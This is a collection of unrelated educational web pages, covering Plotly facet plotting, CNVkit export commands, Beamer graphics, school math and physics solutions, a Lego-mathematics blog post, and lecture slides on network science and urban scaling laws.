                                    "time": ["Lunch", "Dinner"]})
fig.show()
```

### Facets With Independent Axes

By default, facet axes are linked together: zooming inside one of the facets will also zoom in the other facets. You can disable this behaviour when you use `facet_row` only, by disabling `matches` on the Y axes, or when using `facet_col` only, by disabling `matches` on the X axes. It is not recommended to use this approach when using `facet_row` and `facet_col` together, as in this case it becomes very hard to understand the labelling of axes and grid lines.

```python
import plotly.express as px

df = px.data.tips()
fig = px.scatter(df, x="total_bill", y="tip", color='sex', facet_row="day")
fig.update_yaxes(matches=None)
fig.show()
```

```python
import plotly.express as px

df = px.data.tips()
fig = px.scatter(df, x="total_bill", y="tip", color='sex', facet_col="day")
fig.update_xaxes(matches=None)
fig.show()
```

### Customize Subplot Figure Titles

Since subplot figure titles are annotations, you can use the `for_each_annotation` function to customize them, for example to remove the equal sign (`=`). In the following example, we pass a lambda function to `for_each_annotation` in order to change the figure subplot titles from `smoker=No` and `smoker=Yes` to just `No` and `Yes`.

```python
import plotly.express as px

fig = px.scatter(px.data.tips(), x="total_bill", y="tip", facet_col="smoker")
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
fig.show()
```

### Controlling Facet Ordering

By default, Plotly Express lays out categorical data in the order in which it appears in the underlying data.
Every 2-d cartesian Plotly Express function also includes a `category_orders` keyword argument which can be used to control the order in which categorical axes are drawn, but beyond that can also control the order in which discrete colors appear in the legend, and the order in which facets are laid out.

```python
import plotly.express as px

df = px.data.tips()
fig = px.bar(df, x="day", y="total_bill", color="smoker", barmode="group", facet_col="sex",
             category_orders={"day": ["Thur", "Fri", "Sat", "Sun"],
                              "smoker": ["Yes", "No"],
                              "sex": ["Male", "Female"]})
fig.show()
```

### Controlling Facet Spacing

The `facet_row_spacing` and `facet_col_spacing` arguments can be used to control the spacing between rows and columns. These values are specified in fractions of the plotting area in paper coordinates, not in pixels, so they will grow or shrink with the width and height of the figure. The defaults work well with 1-4 rows or columns at the default figure size with the default font size, but need to be reduced to around 0.01 for very large figures or figures with many rows or columns. Conversely, if tick labels are activated on all facets, the spacing will need to be increased.

```python
import plotly.express as px

df = px.data.gapminder().query("continent == 'Africa'")
fig = px.line(df, x="year", y="lifeExp", facet_col="country", facet_col_wrap=7,
              facet_row_spacing=0.04,  # default is 0.07 when facet_col_wrap is used
              facet_col_spacing=0.04,  # default is 0.03
              height=600, width=800,
              title="Life Expectancy in Africa")
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
fig.update_yaxes(showticklabels=True)
fig.show()
```

### Synchronizing axes in subplots with `matches`

Using `facet_col` from Plotly Express lets you zoom and pan each facet to the same range implicitly. However, if the subplots are created with `make_subplots`, the axes need to be updated with the `matches` parameter to update all the subplots accordingly.
Zoom in one trace below to see the other subplots zoomed to the same x-axis range. To pan all the subplots, click and drag from the center of the x-axis to the side:

```python
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import numpy as np

N = 20
x = np.linspace(0, 1, N)

fig = make_subplots(1, 3)
for i in range(1, 4):
    # The trace-adding call was lost in extraction; a scatter per column is assumed.
    fig.add_trace(go.Scatter(x=x, y=np.random.random(N)), 1, i)
fig.update_xaxes(matches='x')
fig.show()
```
https://iim-cat-questions-answers.2iim.com/quant/algebra/progressions/progressions_17.shtml
# Arithmetic and Geometric Progressions

## Total Amount

Ram invests different amounts on shares during the year. S1, S2, S3, ..., Sm are the sums of 'n' amounts invested in each of 'm' years. If the amounts invested during the years are in A.P.s whose first terms are 1, 2, 3, ..., m and whose common differences are 1, 3, 5, ..., (2m-1) respectively, find the total amount invested by Ram in 'm' years.

1. n(m+1)
2. m+1
3. $\frac{mn}{2}(mn+1)$
4. cannot be determined

Choice C. $\frac{mn}{2}(mn+1)$

## Detailed Solution

Each year's investments form an A.P. of n terms, so by $S = \frac{n}{2}[2a + (n-1)d]$ we have

$S_1 = \frac{n}{2}[2(1) + (n-1)(1)]$  (since a = 1, d = 1)

$S_2 = \frac{n}{2}[2(2) + (n-1)(3)]$  (since a = 2, d = 3)

$S_3 = \frac{n}{2}[2(3) + (n-1)(5)]$  (since a = 3, d = 5)

...

$S_m = \frac{n}{2}[2(m) + (n-1)(2m-1)]$  (since a = m, d = 2m-1)

Therefore,

$S_1 + S_2 + \dots + S_m = \frac{n}{2}\left[2(1+2+3+\dots+m) + (n-1)(1+3+5+\dots+(2m-1))\right]$

$= \frac{n}{2}\left[2 \cdot \frac{m}{2}(1+m) + (n-1) \cdot \frac{m}{2}(1+(2m-1))\right]$  (using $S = \frac{n}{2}(a+l)$)

$= \frac{n}{2}\left[m(m+1) + m^2(n-1)\right]$

$= \frac{mn}{2}\left[(m+1) + m(n-1)\right]$

$= \frac{mn}{2}(mn+1)$

Correct Answer: $\frac{mn}{2}(mn+1)$
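The closed form can also be checked numerically. Below is a quick sketch (not part of the original solution) that sums each year's A.P. directly and compares the total with $\frac{mn}{2}(mn+1)$:

```python
# Sum each year's A.P. directly: year k has first term k and common
# difference 2k - 1, with n terms. The total should equal (mn/2)(mn + 1).
def total_invested(m, n):
    total = 0
    for k in range(1, m + 1):
        a, d = k, 2 * k - 1
        total += sum(a + j * d for j in range(n))
    return total

print(total_invested(5, 7), 5 * 7 * (5 * 7 + 1) // 2)  # both are 630
```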
http://www.mathgoespop.com/2012/01/lego-math-maniac.html
# Lego Math Maniac Though I have lived in Southern California for several years, I have never been to Legoland, a theme park based around the classic (and awesome) children’s toys.  The park perennially sits in the shadow of more popular parks in the region (e.g. Disneyland, Universal Studios, and the Banana Club Museum), and its prices make it hard to justify a visit for an adult male with no children, no matter how many fond Lego memories he may have from his childhood.  However, given the recent attention Lego has received in the context of mathematics, it may be time to finally plan a trip. A recent article on Wired’s website discusses the mathematics of Lego – more specifically, it highlights an article on the complexity of Lego systems.  As any child will tell you, Lego sets can vary from very simple, small sets, to much larger and more complicated ones.  As a simple corollary, smaller sets will have fewer pieces, and larger sets will have more pieces.  But how does the number of types of pieces grow as the size of the set grows?  For example, if a 100 piece set consists of 10 different types of pieces, is it reasonable to guess that a 1000 piece set will consist of 100 different types of pieces? In a word, no.  Though the number of different types of pieces will grow as the size of a set grows, it will grow slower than the size of the set (in other words, it will grow sub-linearly).  To put it another way, as the size of the Lego set grows, rather than building more and more new types of pieces, the same types of pieces that are present in smaller sets tend to be used in new ways.  The effect is that the proportion of distinct piece types decreases as the size of the set grows.  From a mathematical standpoint, if we let y denote the number of different types of pieces, and x be the number of pieces, then this power law is giving us the following equation: $y = Ax^{b},$ for some constants A and b, with b between 0 and 1.  
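To make the power-law idea concrete, here is a small sketch (the numbers are invented for illustration, not taken from the Lego study): since log y = log A + b log x, the exponent b is simply the slope of a least-squares line in log-log space.

```python
import numpy as np

# Hypothetical (piece count, piece-type count) data generated from
# y = A * x^b with A = 1.6 and b = 0.7 -- invented for illustration.
x = np.array([100.0, 250.0, 500.0, 1000.0, 2000.0])
y = 1.6 * x ** 0.7

# log y = log A + b log x, so fit a degree-1 polynomial in log space;
# np.polyfit returns the slope first, then the intercept.
b, log_A = np.polyfit(np.log(x), np.log(y), 1)
print(round(b, 3), round(np.exp(log_A), 3))  # recovers b = 0.7, A = 1.6
```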
While y grows as x grows, it does not grow as quickly as x itself.

Taken in a broader context, though, this should not be surprising.  Examples of similar phenomena are prevalent throughout nature, as well as in man-made phenomena such as urban planning.  One example cited in the Wired article is Kleiber's Law, which states that the ratio of an animal's metabolic rate to its mass tends to decrease as mass increases (in other words, larger animals are capable of metabolizing more efficiently).  Here's an article that discusses an analogue of this power law in the context of brain development, and relates this to the development of cities.

So the next time you give a Lego set to a child, feel free to explain this connection – I'm sure any child will welcome the math lesson (at least, any child worth giving a Lego set to in the first place).  It's also worth noting that this phenomenon is most likely not unique to Lego sets – I am eagerly awaiting a similar report on the mathematics of Tinkertoys – though unfortunately, in this case the number of piece types seems not to have increased in nearly a century.

### 5 comments to Lego Math Maniac

• Matt Foulger: Nice post Matt. Nice shout out to Kleiber's law. I've watched a presentation on the metabolism of cities before and as an urban planning dilettante I found it quite interesting. As for Lego, I definitely thought about the complexity and size of Lego sets as a kid but I couldn't figure out the relationship, being 11. It seemed like you had to get the bigger sets in order to score the cool new pieces, but there never seemed to be enough of them in the set. Actually, when it came to free form creative rebuilding, the true magic of Lego, I found the funky pieces to be less useful because there wasn't a critical mass of pieces in their style to be of much use. I usually found myself wanting more of the 'core' style pieces so I could build bigger castle walls, for example.
By the way, I'm sure someone could get some pretty interesting results from analyzing the aggregate inventory of the big Lego piece resellers online. Every piece has a standard code and they are categorized by color, size, etc. Cheers dude.

• I totally agree with regards to creative rebuilding. My own personal preference was to take the heads of all of my lego men and form a giant lego head totem pole, but perhaps this is not something I should so freely admit. Nice idea regarding Lego inventory as well. I wonder which colors are the most popular!

• Smith: 1993… I was a completely inspired lego maniac. I had two "giant" card tables in the basement completely devoted to Lego worlds I was building. One was of the "Town" variety, while the other was of the "Pirate" scene. For a time, my mother would always gift me with the same small lego pack (car with a motorcycle and a little trailer) whenever I was sick. After receiving it three times, I debated saying something to her. Though I realized that while I never really cared to build the intended sets, I did now have a small stock pile of the "unique" parts that allowed me to really start doing some fun stuff with those parts. There is something to be said for the smaller cheaper packs, but you have to get a lot of them to build up the value of those random parts.

• Patrick: Holy smokes, that Banana Club Museum is a little frightening.

• @Smith we should organize a lego playdate asap. @Patrick, if by frightening you mean fantastic, then yes, I agree. To everyone else, a reader sent a great little Lego infographic my way. Did you know that Lego designs sets for university aged students? If only I had known! Here's the link: http://www.onlinecollege.org/2012/01/30/the-learning-power-of-lego/ (thanks Muhammad!)
https://www.learningfarm.com/web/practicePassThrough.cfm?TopicID=1300
Standard: Math.6.RP.3c or 6.RP.A.3.C
Description: Find a percent of a quantity as a rate per 100 (e.g., 30% of a quantity means 30/100 times the quantity); solve problems involving finding the whole, given a part and the percent.

6th Grade Math - Percents Lesson
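A minimal sketch of the two computations the standard describes (the function names are mine, not from the lesson):

```python
# "30% of a quantity" means 30/100 times the quantity.
def percent_of(percent, whole):
    return percent / 100 * whole

# Finding the whole, given a part and the percent: whole = part / (percent/100).
def whole_from_part(part, percent):
    return part / (percent / 100)

print(percent_of(30, 50))       # 15.0
print(whole_from_part(15, 30))  # 50.0
```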
https://www.gradesaver.com/textbooks/math/precalculus/precalculus-10th-edition/chapter-5-exponential-and-logarithmic-functions-5-3-exponential-functions-5-3-assess-your-understanding-page-280/2
## Precalculus (10th Edition)

$x=-4$ or $x=1$

Subtract $4$ from each side:

$x^2+3x-4=0$

Factor the trinomial to obtain:

$(x+4)(x-1)=0$

Use the Zero-Product Property to obtain:

$x+4=0$ or $x-1=0$

Hence, $x=-4$ or $x=1$.
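As a quick sanity check (a sketch, not part of the textbook solution), substituting the claimed roots into the quadratic should give zero:

```python
# Substitute the claimed roots into x^2 + 3x - 4; both should evaluate to 0.
def p(x):
    return x**2 + 3*x - 4

print(p(-4), p(1))  # 0 0
```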
http://cnvkit.readthedocs.io/en/stable/importexport.html
# Compatibility and other I/O

## version

Print CNVkit's version as a string on standard output:

```shell
cnvkit.py version
```

If you submit a bug report or feature request for CNVkit, please include the CNVkit version in your message so we can help you more efficiently.

## import-picard

Convert Picard CalculateHsMetrics per-target coverage files (.csv) to the CNVkit .cnn format:

```shell
cnvkit.py import-picard *.hsmetrics.targetcoverages.csv *.hsmetrics.antitargetcoverages.csv
cnvkit.py import-picard picard-hsmetrics/ -d cnvkit-from-picard/
```

You can use Picard tools to perform the bin read depth and GC calculations that CNVkit normally performs with the coverage and reference commands, if need be. Procedure:

1. Use the target and antitarget commands to generate the "targets.bed" and "antitargets.bed" files.
2. Convert those BED files to Picard's "interval list" format by adding the BAM header to the top of the BED file and rearranging the columns; see the Picard command BedToIntervalList.
3. Run Picard CalculateHsMetrics on each of your normal/control BAM files with the "targets" and "antitargets" interval lists (separately), your reference genome, and the "PER_TARGET_COVERAGE" option.
4. Use import-picard to convert all of the PER_TARGET_COVERAGE files to CNVkit's .cnn format.
5. Use reference to build a CNVkit reference from those .cnn files. It will retain the GC values Picard calculated; you don't need to provide the reference genome sequence again to get GC (but if you do, it will also calculate the RepeatMasker fraction values).
6. Use batch with the -r/--reference option to process the rest of your test samples.

## import-seg

Convert a file in the SEG format (e.g. the output of standard CBS or the GenePattern server) into one or more CNVkit .cns files. The chromosomes in a SEG file may have been converted from chromosome names to integer IDs. Options in import-seg can help recover the original names.

• To add a "chr" prefix, use "-p chr".
• To convert chromosome indices 23, 24 and 25 to the names "X", "Y" and "M" (a common convention), use "-c human".
• To use an arbitrary mapping of indices to chromosome names, use a comma-separated "key:value" string. For example, the human convention would be: "-c 23:X,24:Y,25:M".

## import-theta

Convert the ".results" output of THetA2 to one or more CNVkit .cns files representing subclones with integer absolute copy number in each segment.

```shell
cnvkit.py import-theta Sample.cns Sample.BEST.results
```

See the page on Tumor heterogeneity for more guidance on performing this analysis.

## export

Convert copy number ratio tables (.cnr files) or segments (.cns) to another format.

### bed

Segments can be exported to BED format to support a variety of other uses, such as viewing in a genome browser. By default only regions with copy number different from the given ploidy (default 2) are output. (Notice what this means for allosomes.) To output all segments, use the --show all option.

The BED format represents integer copy numbers in absolute scale, not log2 ratios. If the input .cns file contains a "cn" column with integer copy number values, as generated by the call command, export bed will use those values. Otherwise the log2 ratio value of each input segment is converted and rounded to an integer value, similar to the call -m clonal method.

```shell
# Estimate integer copy number of each segment
cnvkit.py call Sample.cns -y -o Sample.call.cns
# Show estimated integer copy number of all regions
cnvkit.py export bed Sample.call.cns --show all -y -o Sample.bed
```

The same BED format can also specify CNV regions to the FreeBayes variant caller with FreeBayes's --cnv-map option:

```shell
# Show only CNV regions
cnvkit.py export bed Sample.call.cns -o all-samples.cnv-map.bed
```

### vcf

Convert segments, ideally already adjusted by the call command, to a VCF file.
Copy ratios are converted to absolute integers, as with BED export, and VCF records are created for the segments where the copy number is different from the expected ploidy (e.g. 2 on autosomes, 1 on haploid sex chromosomes, depending on sample sex). Chromosomal sex can be specified with the -x/--sample-sex option, or will be guessed automatically. If a male reference is used, use -y/--male-reference to say so. Note that these are different: if a female sample is run with a male reference, segments on chromosome X with log2-ratio +1 will be skipped, because that's the expected copy number, while an X-chromosome segment with log2-ratio 0 will be printed as a hemizygous loss.

```shell
cnvkit.py export vcf Sample.cns -y -g female -i "SampleID" -o Sample.cnv.vcf
```

### cdt, jtv

A collection of probe-level copy ratio files (*.cnr) can be exported to Java TreeView via the standard CDT format or a plain text table:

```shell
cnvkit.py export jtv *.cnr -o Samples-JTV.txt
cnvkit.py export cdt *.cnr -o Samples.cdt
```

### seg

Similarly, the segmentation files for multiple samples (*.cns) can be exported to the standard SEG format to be loaded in the Integrative Genomics Viewer (IGV):

```shell
cnvkit.py export seg *.cns -o Samples.seg
```

### nexus-basic

The format nexus-basic can be loaded directly by the commercial program Biodiscovery Nexus Copy Number, specifying the "basic" input format in that program. This allows viewing CNVkit data as if it were from array CGH.

This is a tabular format very similar to .cnr files, with the columns:

1. chromosome
2. start
3. end
4. log2

### nexus-ogt

The format nexus-ogt can be loaded directly by the commercial program Biodiscovery Nexus Copy Number, specifying the "Custom-OGT" input format in that program. This allows viewing CNVkit data as if it were from a SNP array.

This is a tabular format similar to .cnr files, but with B-allele frequencies (BAFs) extracted from a corresponding VCF file. The format's columns are (with .cnr equivalents):

1. "Chromosome" (chromosome)
2. "Position" (start)
3. "Position" (end)
4. "Log R Ratio" (log2)
5. "B-Allele Frequency" (from VCF)

The positions of each heterozygous variant record in the given VCF are matched to bins in the given .cnr file, and the variant allele frequencies are extracted and assigned to the matching bins.

• If a bin contains no variants, the BAF field is left blank.
• If a bin contains multiple variants, the BAFs of those variants are "mirrored" to be all above .5 (e.g. a BAF of .3 becomes .7), then the median is taken as the bin-wide BAF.

### theta

THetA2 is a program for estimating normal-cell contamination and tumor subclone population fractions based on a tumor sample's copy number profile and, optionally, SNP allele frequencies. (See the page on Tumor heterogeneity for more guidance.)

THetA2's input file is a BED-like file, typically with the extension .interval_count, listing the read counts within each copy-number segment in a pair of tumor and normal samples. CNVkit can generate this file given the CNVkit-inferred tumor segmentation (.cns), bypassing the initial step of THetA2, CreateExomeInput, which counts the reads in each sample's BAM file. The normal-sample read counts in this file are used for weighting each segment in THetA2's calculations.
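As an illustration only (this is not CNVkit's actual code), the BAF "mirroring" rule described under nexus-ogt above can be sketched as:

```python
import statistics

# Mirror each BAF to be >= 0.5, then take the median across a bin's variants;
# an empty bin yields None (the field is left blank).
def bin_baf(bafs):
    if not bafs:
        return None
    mirrored = [b if b >= 0.5 else 1 - b for b in bafs]
    return statistics.median(mirrored)

print(bin_baf([0.3, 0.55, 0.8]))  # 0.7
```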
We recommend providing these to export theta via the CNVkit pooled or paired reference file (.cnn) you created for your panel:

```shell
# From an existing CNVkit reference
cnvkit.py export theta Sample_Tumor.cns reference.cnn -o Sample.theta2.interval_count
```

The THetA2 normal read counts can also be derived from the normal sample's bin log2 ratios, if for some reason this is all you have:

```shell
# From a paired normal sample
cnvkit.py export theta Sample_Tumor.cns Sample_Normal.cnr -o Sample.theta2.interval_count
```

If neither file is given, the THetA2 normal read counts will be calculated from the segment weight values in the given .cns file, or the number of probes if the "weight" column is missing, or, as a last resort, the segment sizes if the "probes" column is also missing:

```shell
# From segment weights and/or probe counts
cnvkit.py export theta Sample_Tumor.cns -o Sample.theta2.interval_count
```

THetA2 can also take the tumor and normal samples' SNP allele frequencies as input to improve its estimates. THetA2 uses another custom format for these values, and provides another script for creating these files from VCF, which we'd again prefer to bypass. CNVkit's export theta command produces these two additional files when given a VCF file of paired tumor-normal SNV calls with the -v/--vcf option:

```shell
cnvkit.py export theta Sample_Tumor.cns reference.cnn -v Sample_Paired.vcf
```

This produces three output files; -o will be used for the read count file, while the SNV allele count files will be named according to the .cns file, e.g. Sample_Tumor.tumor.snp_formatted.txt and Sample_Tumor.normal.snp_formatted.txt.
https://questioncove.com/updates/4fc153a0e4b0964abc833bf9
Mathematics

OpenStudy (anonymous): The plans of a public park include a circular fountain. The outline of the fountain can be modeled with the equation (x-4)^2 + (y+5)^2 = 50, where the units are meters and the graph is on a grid map of the park.
a. Find the coordinates of the center.
b. Find the circumference of the fountain.
Any help would be gladly appreciated xxx

OpenStudy (anonymous): The circle equation $\left( x - a \right)^{2} + \left( y - b \right)^{2} = r^{2}$ has center (a, b) and radius r.

OpenStudy (anonymous): Thank you :)
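Applying the reply above to this fountain (a quick sketch): a = 4, b = -5, and r² = 50, so the circumference is 2πr.

```python
import math

# (x-4)^2 + (y+5)^2 = 50  ->  center (4, -5), radius sqrt(50).
center = (4, -5)
r = math.sqrt(50)
circumference = 2 * math.pi * r
print(center, round(circumference, 2))  # (4, -5) 44.43
```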
https://www.projecteuclid.org/euclid.bj/1066418879
## Bernoulli

Bernoulli, Volume 9, Number 5 (2003), 809-831.

### Empirical processes of long-memory sequences

Wei Biao Wu

#### Abstract

Asymptotic expansions of long-memory sequences indexed by piecewise differentiable functionals are investigated, and upper bounds of outer expectations of these functionals are given. These results differ strikingly from the classical theories of empirical processes of independent random variables. Our results go beyond earlier ones by allowing wider classes of function as well as by presenting sharper bounds, and thus provide a more versatile approach for related statistical inferences. A complete characterization of empirical processes for the class of indicator functions is presented, and an application to $M$-estimation is discussed.

#### Article information

Source: Bernoulli, Volume 9, Number 5 (2003), 809-831.
First available in Project Euclid: 17 October 2003
Digital Object Identifier: doi:10.3150/bj/1066418879
Mathematical Reviews number (MathSciNet): MR2047687
Zentralblatt MATH identifier: 1188.62288

#### Citation

Wu, Wei Biao. Empirical processes of long-memory sequences. Bernoulli 9 (2003), no. 5, 809-831. doi:10.3150/bj/1066418879. https://projecteuclid.org/euclid.bj/1066418879
https://userpages.umbc.edu/~rostamia/beamer/quickstart-Z-H-13.html
# 13  Including graphics

Beamer recognizes images in any of the pdf, png and jpg formats. (Note that PostScript is not among these.) In the following sample we include three pictures side-by-side in a slide.

% graphics.tex
\documentclass{beamer}
\usetheme{Copenhagen}
\begin{document}
\begin{frame}{Graphics}
Here we include three images, one each of PDF, PNG, and JPG types.
\begin{center}
\includegraphics[width=0.3\textwidth]{image1.pdf}
\includegraphics[width=0.3\textwidth]{image2.png}
\includegraphics[width=0.3\textwidth]{image3.jpg}
\end{center}
\end{frame}
\end{document}

Here is the result:

## Converting graphics

When you create an image with the intention of including it in a Beamer document, it is best if you save it in one of the pdf, png or jpg formats that are recognizable by Beamer.[4] This is sometimes not possible. For instance, you may have downloaded the image from somewhere and it is in the gif format. The department's computer facilities provide a large number of utilities for converting and modifying graphical images.

### eps to pdf

To convert an Encapsulated PostScript image to pdf, do:

epstopdf filename.eps

This will produce a file named filename.pdf.[5]

### All other conversions

The general-purpose convert[6] command converts from any graphics format to any other graphics format. For instance, to convert a gif file to the png format, do:

convert filename.gif filename.png

Similarly, to convert a tiff file to jpg, do:

convert filename.tiff filename.jpg

In fact, we can have convert take over the job of epstopdf as well, as in:

convert filename.eps filename.pdf

However, in my experience epstopdf produces better results.

[4] The png format works best for line drawings, such as graphs of functions in 2D. The jpg format works best with gradually varying shades, such as the photograph of a person's face.
[5] The epstopdf utility is a perl script that calls ghostscript to do the actual conversion. In many Linux distributions it is bundled with the main TeX/LaTeX package.
[6] The convert utility is a part of the ImageMagick suite of graphics manipulation utilities.
https://byjus.com/questions/a-raft-of-wood-density-600-g-m3-of-mass-120-kg-floats-in-water-how-much-weight-can-be-put-on-the-raft-to-make-it-just-sink/
# A Raft Of Wood (Density 600 kg/m³) Of Mass 120 kg Floats In Water. How Much Weight Can Be Put On The Raft To Make It Just Sink?

Given: density of wood = $$600 \; kg/m^{3}$$, mass of the raft = 120 kg. (Take the density of water as $$1000 \; kg/m^{3}$$.)

Volume of the raft = $$\frac{120}{600} = 0.2 \; m^{3}$$

The mass of water displaced when the raft is just fully submerged:

$$\Rightarrow$$ 0.2 * 1000

$$\Rightarrow$$ 200 kg

The mass of the raft of wood = 120 kg

Therefore, the additional weight required to make the raft just sink is:

$$\Rightarrow$$ 200 – 120 = 80 kg.

Explore more such questions and answers at BYJU’S.
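The working above can be condensed into a few lines of code (a quick sketch; the variable names are illustrative):

```python
# Buoyancy check: a raft of wood (density 600 kg/m^3, mass 120 kg) floats in water.
rho_wood = 600.0    # kg/m^3
rho_water = 1000.0  # kg/m^3
mass_raft = 120.0   # kg

volume = mass_raft / rho_wood           # volume of the raft: 0.2 m^3
max_displaced = volume * rho_water      # mass of water displaced when fully submerged: 200 kg
extra_load = max_displaced - mass_raft  # additional mass that just sinks the raft

print(extra_load)  # 80.0
```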
https://www.gradesaver.com/textbooks/math/algebra/elementary-and-intermediate-algebra-concepts-and-applications-6th-edition/chapter-2-equations-inequalities-and-problem-solving-2-3-formulas-2-3-exercise-set-page-101/49
## Elementary and Intermediate Algebra: Concepts & Applications (6th Edition)

$l=4t+w-108$

Using the properties of equality, the given equation, $t=27-\dfrac{1}{4}(w-l)$, solved in terms of $l$, is equivalent to \begin{array}{l} 4(t)=4(27)-1(w-l) \\\\ 4t=108-w+l \\\\ 4t-108+w=l \\\\ l=4t+w-108 .\end{array}
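The rearrangement can be spot-checked numerically by picking arbitrary values for $w$ and $l$ (a quick sketch):

```python
# Check that t = 27 - (1/4)(w - l) is equivalent to l = 4t + w - 108.
w, l = 10.0, 6.0             # arbitrary test values
t = 27 - 0.25 * (w - l)      # original formula: t = 26.0
l_solved = 4 * t + w - 108   # rearranged formula should recover l

print(l_solved)  # 6.0
```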
https://etranos.info/urban_analytics_city_science/src/network_science.html
Network science, urban laws and scaling

Emmanouil Tranos

University of Bristol, Alan Turing Institute

e.tranos@bristol.ac.uk, @EmmanouilTranos, etranos.info

Network Science: The Evolution of a ‘New’ Science

• Not really new
• Graph Theory in the 18th century
• Leonhard Euler’s work on small graphs
• High degree of regularity: similar degree centrality among different nodes

1st milestone: Random networks (RN)

• 20th Century: advances in mathematics and statistics
• Algorithmic network analysis
• Erdős, Rényi, et al. (1960)
• Large scale networks with no obvious structure
• Node degree follows a Poisson distribution: similar degrees, close to the average degree, rare exceptions
• Representative of real world networks?

1st milestone: Random networks (RN)

Source: Watts and Strogatz (1998)

1st milestone: Random networks (RN)

Source: Torres et al. (2009)

Networks become important…

• … in different fields, from social science to biology
• Digitization of data in many different fields + large databases ➔ real world systems as networks
• Advances in computer science and in computing
• Looseness between different disciplinary boundaries
• Reductionist approaches lose ground in favor of holistic research approaches, which try to understand the system as a whole

2nd milestone: Small-worlds

• Small world effect
• Milgram’s six degrees of separation (1967)
• Bacon number
• Short average distances, enabling nodes to reach each other within a few steps
• Characteristic of numerous real world networks
• Structural characteristic rather than an organizing principle
• Even RN networks are characterized by short average distances

2nd milestone: Small-worlds

• Watts and Strogatz (1998) Small-world (SW) model
• Coexistence of short average distance with high clustering coefficient
• SW networks are located between regular and random networks:
• Highly clustered like regular lattices
• Small distances like random networks
• Node degree distribution is quite similar to that of RN and decays
exponentially

2nd milestone: Small-worlds

• A set of intensively interconnected local clusters, which gain global connectivity via a few links, which span the entire network linking distant clusters
• Nodes in SW networks benefit from the high local connectivity and easy distant communication with remote clusters using the inter-cluster links
• Probability of finding a highly connected node decreases exponentially, so highly connected nodes are practically absent in RN and SW models

2nd milestone: Small-worlds

Source: Watts and Strogatz (1998)

2nd milestone: Small-worlds

Pros and cons

• Social capital (bridging and bonding)
• Real world examples?

3rd milestone: Scale-free (SF) networks

• Barabási and Albert (1999)
• Very few super connected nodes and a vast majority of less connected nodes
• SF: node degree distribution follows a power law regardless of the scale of observation
• 2 main formation mechanisms:
• growth: expansion of networks over time
• preferential attachment: growth is not equally dispersed across the nodes; highly connected nodes are more likely to receive new links than the lower degree nodes

3rd milestone: Scale-free (SF) networks

• An initial difference in the connectivity between two nodes will increase further as the network grows
• This is a cumulative, rich-get-richer process
• The probability $P(k)$ that a node has degree $k$ decays following a power function, usually with $2 < \gamma < 3$: $P(k) \approx k^{-\gamma}$
• Power laws in networks are related to the existence of both of the above two mechanisms
• Later versions of SF models included more realistic options for the network growth

3rd milestone: Scale-free (SF) networks

Source: Albert, Jeong, and Barabási (2000)

3rd milestone: Scale-free (SF) networks

And finally the power law…

3rd milestone: Scale-free (SF) networks

Pros and cons?

• Efficiency
• Resilience
• Vulnerability towards targeted attacks
• Real world examples?
Network Science: a summary

• Both RN and SW have short average distances
• RN cannot be included in SW because they lack the high clustering coefficient
• SF networks share the short average distance and the high clustering coefficient of SW ones, but SW networks are not characterized by the scale-free distribution
• All scale-free networks display small-world properties, but not all small-world networks are scale free

Network science: An epistemological discussion

1. Complexity Science

• Most studies in the network science domain have a starting point in statistical physics
• Stochastic approaches
• Underlying probability model which usually follows a power law
• Main objective: identification of the underlying mechanisms using generative modeling and simulation
• Potential risk: the probability model might not follow a power law mechanism, which is a common assumption

Network science: An epistemological discussion

2. Social Network Analysis

• Sociology and graph theory
• Focus on social networks
• Extensive utilization of network metrics

Network science: An epistemological discussion

3. Geography and Urban Analytics

• ‘Softer’ approaches
• Ex-post empirical modeling for identifying characteristics of theoretical network models in real world networks
• Global and local network statistics
• Use of network measures in mainstream statistical modeling
• Empirical verification of the functions that better explain the node degree distribution (power vs.
exponential functions)
• Spatial networks, but also dynamic networks

Scaling

What is scale and scaling

• Scale in geography
• Scale in math:
• $y(x_i)$ a function of $x_i$ where $i$ is a spatial unit
• If we scale $x$ by some scalar $\lambda$, the function scales if its scaled value is proportional to its previous value: $y(\lambda x_i) \propto y(x_i)$
• $y(x_i) = x_i^a$
• $y(\lambda x_i) = (\lambda x_i)^a = \lambda^a x_i^a = \lambda^a y(x_i)$
• ➔ Power law

Laws of urban scaling

• Regularities
• Quantitative revolution post WW2
• Cultural turn
• … today …

Metcalfe’s law / Moore’s law

• As cities grow…
• … the number of potential connections increases as the square of population.
• $C = p(p-1)/2 \propto p^2$

von Thünen’s law

• As cities grow in size…
• … land values decline non-linearly from the centre

Source: Coe, Kelly, and Yeung (2019)

Law of gravitation / Tobler’s law

• As cities grow…
• … interactions between them decline with increasing distance
• Newton’s law of gravitation

Source: I, Dennis Nilsson, CC BY 3.0, https://commons.wikimedia.org/w/index.php?curid=3455682

Zipf law

• As cities get larger…
• … there are fewer of them
• Regularity in the distribution of cities within a country
• Empirical observation and quantification
• Hierarchical urban systems:
• one/a few big cities
• more medium size cities
• large number of very small cities

Zipf law

Source: O’Sullivan (2012)

Rank size rule

$pop_i = pop_d r_i^{-a}$

if $a=1$: Zipf law

$pop_i = pop_d / r_i$

Zipf law

• Primary cities above what a Zipf law would predict
• Newly industrialised countries
• No overall consensus why the rank-size rule holds
• Statistical regularity or an underpinning micro-economic process?
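The rank-size rule is easy to illustrate numerically. The sketch below (pure Python, with a made-up largest-city population) generates a perfect Zipf distribution with $a = 1$ and then recovers the exponent from the data with a log-log least-squares fit, the same ex-post empirical strategy mentioned above:

```python
import math

pop_largest = 8_000_000  # hypothetical population of the largest city
a = 1.0                  # Zipf exponent

# pop_i = pop_d * r_i^(-a) for ranks 1..100
ranks = range(1, 101)
pops = [pop_largest / r**a for r in ranks]

# Estimate the exponent back with a log-log least-squares fit:
# log(pop) = log(pop_d) - a * log(rank), so the slope should be -1.
xs = [math.log(r) for r in ranks]
ys = [math.log(p) for p in pops]
n = len(xs)
mx, my = sum(xs) / n, sum(ys) / n
slope = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / sum((x - mx) ** 2 for x in xs)

print(round(slope, 6))  # -1.0
```

With real city-size data the fitted slope typically deviates from −1, which is exactly the empirical question the slides raise.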
Bettencourt-West or Marshall’s law

• As cities grow…
• … their average real income (and wealth) increases more than proportionately

$Y_i = Y_0P_i^\beta$

• $Y_i$: material resources (energy or infrastructure) or social activity (wealth, patents, and pollution) in city $i$
• $Y_0$: normalization constant
• $P_i$: population of city $i$
• $\beta$: exponent

